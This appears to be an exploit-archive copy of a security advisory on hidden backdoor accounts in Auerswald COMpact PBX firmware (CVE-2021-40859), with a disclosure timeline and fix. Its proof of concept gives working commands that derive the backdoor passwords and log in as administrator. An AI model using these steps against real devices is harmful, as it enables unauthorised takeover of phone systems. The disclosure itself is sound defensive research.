扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 |
# Exploit Title: Auerswald COMpact 8.0B - Multiple Backdoors # Date: 06/12/2021 # Exploit Author: RedTeam Pentesting GmbH Advisory: Auerswald COMpact Multiple Backdoors RedTeam Pentesting discovered several backdoors in the firmware for the Auerswald COMpact 5500R PBX. These backdoors allow attackers who are able to access the web-based management application full administrative access to the device. Details ======= Product: COMpact 3000 ISDN, COMpact 3000 analog, COMpact 3000 VoIP, COMpact 4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX), COMpact 5010 VoIP, COMpact 5020 VoIP, COMmander Business(19"), COMmander Basic.2(19") Affected Versions: <= 8.0B (COMpact 4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX)), <= 4.0S (COMpact 3000 ISDN, COMpact 3000 analog, COMpact 3000 VoIP) Fixed Versions: 8.2B, 4.0T Vulnerability Type: Backdoor Security Risk: high Vendor URL: https://www.auerswald.de/en/product/compact-5500r Vendor Status: fixed version released Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-007 Advisory Status: published CVE: CVE-2021-40859 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40859 Introduction ============ "Fully modular VoIP appliance for more efficient communication processes With the COMpact 5500R, you are originally equipped for everyday business - now and in the future. The fully modular architecture with 80 IP channels and all the functions of a large ITC server allows up to 112 subscribers and thus scales with your company. Continuous maintanance and expansion of the system software makes this versatile IP server a future-proof investment in any business communication." (from the vendor's homepage) More Details ============ Two backdoor passwords were found in the firmware of the COMpact 5500R PBX. One backdoor password is for the secret user "Schandelah", the other can be used for the highest-privileged user "Admin". No way was discovered to disable these backdoors. Proof of Concept ================ The firmware for the COMpact 5500R can be downloaded from the vendor's homepage[1]. The following details refer to firmware version 7.8A, but the latest firmware at the time of writing (8.0B) is affected as well. Inspecting the downloaded file reveals that it is compressed and can be extracted with the program "gunzip": ------------------------------------------------------------------------ $ file 7_8A_002_COMpact5500.rom 7_8A_002_COMpact5500.rom: gzip compressed data, last modified: Wed Sep 23 15:04:43 2020, from Unix, original size 196976698 $ mv 7_8A_002_COMpact5500.rom 7_8A_002_COMpact5500.gz $ gunzip 7_8A_002_COMpact5500.gz ------------------------------------------------------------------------ Analysing the resulting file again shows that it is an image file in the format required by the bootloader "Das U-Boot"[2], a popular bootloader for embedded devices: ------------------------------------------------------------------------ $ file 7_8A_002_COMpact5500.rom 7_8A_002_COMpact5500.rom: u-boot legacy uImage, CP5500 125850, Linux/ARM, Multi-File Image (Not compressed), 196976634 bytes, Wed Sep 23 15:04:38 2020, Load Address: 0x00000000, Entry Point: 0x00000000, Header CRC: 0 xCECA93E8, Data CRC: 0x99E65DF1 ------------------------------------------------------------------------ The program "dumpimage" (included with u-boot) can be used to list the partitions in the image file: ------------------------------------------------------------------------ $ dumpimage -l 7_8A_002_COMpact5500.rom Image Name: CP5500 125850 Created: Wed Sep 23 17:04:38 2020 Image Type: ARM Linux Multi-File Image (uncompressed) Data Size: 196976634 Bytes = 192359.99 KiB = 187.85 MiB Load Address: 00000000 Entry Point: 00000000 Contents: Image 0: 512 Bytes = 0.50 KiB = 0.00 MiB Image 1: 196976110 Bytes = 192359.48 KiB = 187.85 MiB ------------------------------------------------------------------------ The larger partition then was extracted into the file "rootfs" as follows: ------------------------------------------------------------------------ $ dumpimage -i 7_8A_002_COMpact5500.rom -p 1 rootfs ------------------------------------------------------------------------ Contained in the file is an ext2-compatible file system, which was mounted at "/mnt" and inspected: ------------------------------------------------------------------------ $ file rootfs rootfs: Linux rev 1.0 ext2 filesystem data, UUID=c3604712-a2ca-412f-81ca- f302d7f20ef1, volume name "7.8A_002_125850." $ sudo mount -o loop,ro rootfs /mnt $ cat /mnt/etc/passwd root::0:0:root:/root:/bin/sh netstorage::1:1::/data/ftpd:/bin/false web::2:2::/opt/auerswald/lighttpd:/bin/false ------------------------------------------------------------------------ The PBX runs the web server lighttpd[3], the configuration files can be found in the folder "/opt/auerswald/lighttpd". The web server forwards most requests via FastCGI to the program "/opt/auerswald/web/webserver". This program can then be analysed, for example using the reverse engineering program Ghidra[4]. The manual for the PBX reveals that in order to manage the device, users need to log in with the username "sub-admin". When this string is searched within the program in Ghidra, the function which checks passwords on login can be identified. It can easily be seen that besides the username "sub-admin" the function also checks for the hard-coded username "Schandelah", which is the village of Auerswald's headquarter. Further analysis revealed that the corresponding password for this username is derived by concatenating the PBX's serial number, the string "r2d2" and the current date, hashing it with the MD5 hash algorithm and taking the first seven lower-case hex chars of the result. All data needed to derive the password can be accessed without authentication by requesting the path "/about_state", which is also used on the website the PBX redirects users to who abort the password prompt (shortened and formatted to increase readability): ------------------------------------------------------------------------ $ curl --include https://192.168.1.2/about_state HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8; [...] { "pbx": "COMpact 5500R", "pbxType": 35, "pbxId": 0, "version": "Version 7.8A - Build 002", "serial": "1234123412", "date": "30.08.2021", [...] } ------------------------------------------------------------------------ The password can be derived as follows: ------------------------------------------------------------------------ $ echo -n 1234123412r2d230.08.2021 | md5sum | egrep -o '^.{7}' 1432d89 ------------------------------------------------------------------------ This password can then be used for authentication: ------------------------------------------------------------------------ $ curl --include --user 'Schandelah:1432d89' --anyauth \ https://192.168.1.2/tree HTTP/1.1 302 Found Location: /statics/html/page_servicetools.html Set-Cookie: AUERSessionID1234123412=AXCTMGGCCUAGBSE; HttpOnly; Path=/ [...] ------------------------------------------------------------------------ Next, the endpoint "/logstatus_state" can be queried using the returned session ID to check the access level: ------------------------------------------------------------------------ % curl --cookie 'AUERSessionID1234123412=AXCTMGGCCUAGBSE' --include \ https://192.168.1.2/logstatus_state HTTP/1.1 200 OK X-XSS-Protection: 1 Content-Type: application/json; charset=utf-8; [...] {"logstatus":"Haendler"} ------------------------------------------------------------------------ The returned access level is "Haendler" (reseller). After login, the web server redirects to a special service page at the path "/statics/html/page_servicetools.html". Among other things, it allows to download a backup of all data on the device, configure audio recording and reset the password, PIN and token for the user "Admin". Accessing regular administrative functions is not possible directly with this user account. When inspecting the password checking function, a second backdoor can be found. When the username "Admin" is specified, the given password is tested against the configured password as well as a password derived in a similar way from the PBX's serial number, the string "r2d2", the current date and the configured language. The MD5 hash is taken and the specified password is tested against the first seven characters of the lower case hexadecimal hash. The backdoor password for the "Admin" user can be calculated as follows: ------------------------------------------------------------------------ $ echo -n 1234123412r2d230.08.2021DE | md5sum | egrep -o '^.{7}' 92fcdd9 ------------------------------------------------------------------------ The server returns a session ID for that password and the username "Admin": ------------------------------------------------------------------------ $ curl --user 'Admin:92fcdd9' --anyauth --include \ https://192.168.1.2/tree HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8; Set-Cookie: AUERSessionID1234123412=MLJHCDLPMXPNKWY; HttpOnly; Path=/ [...] [{"login":3,"userId":0,"userName":"",[...]}] ------------------------------------------------------------------------ Checking the access level of the session reveals the status "Administrator": ------------------------------------------------------------------------ $ curl --cookie 'AUERSessionID1234123412=MLJHCDLPMXPNKWY' --include \ https://192.168.1.2/logstatus_state HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8; [...] {"logstatus":"Administrator"} ------------------------------------------------------------------------ Workaround ========== Disable or restrict access to the web-based management interface if possible. Fix === Upgrade to a firmware version which corrects this vulnerability. Security Risk ============= By inspecting the firmware for the COMpact 5500R PBX, attackers can easily discover two backdoor passwords. One password is for the secret user account with the username "Schandelah", the other works as an alternative password for the user "Admin". Using the backdoor, attackers are granted access to the PBX with the highest privileges, enabling them to completely compromise the device. The passwords are derived from the serial number, the current date and the configured language. The backdoor passwords are not documented. They secretly coexist with a documented password recovery function supported by the vendor. No way was found to disable the backdoor access. All information needed to derive the passwords can be requested over the network without authentication, so attackers only require network access to the web-based management interface. Due to the ease of exploitation and severe consequences, the backdoor passwords are rated as a high risk. Timeline ======== 2021-08-26 Vulnerability identified 2021-09-01 Customer approved disclosure to vendor 2021-09-10 Vendor notified 2021-09-10 CVE ID requested 2021-09-10 CVE ID assigned 2021-10-05 Vendor provides access to device with fixed firmware 2021-10-11 Vendor provides fixed firmware 2021-10-15 RedTeam Pentesting examines device, vulnerability seems to be corrected 2021-12-06 Advisory published References ========== [1] https://www.auerswald.de/de/support/download/firmware-compact-5500 [2] https://www.denx.de/wiki/U-Boot [3] https://www.lighttpd.net [4] https://ghidra-sre.org RedTeam Pentesting GmbH ======================= RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting ============================= RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://www.redteam-pentesting.de/jobs/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachenhttps://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen |
体验盒子
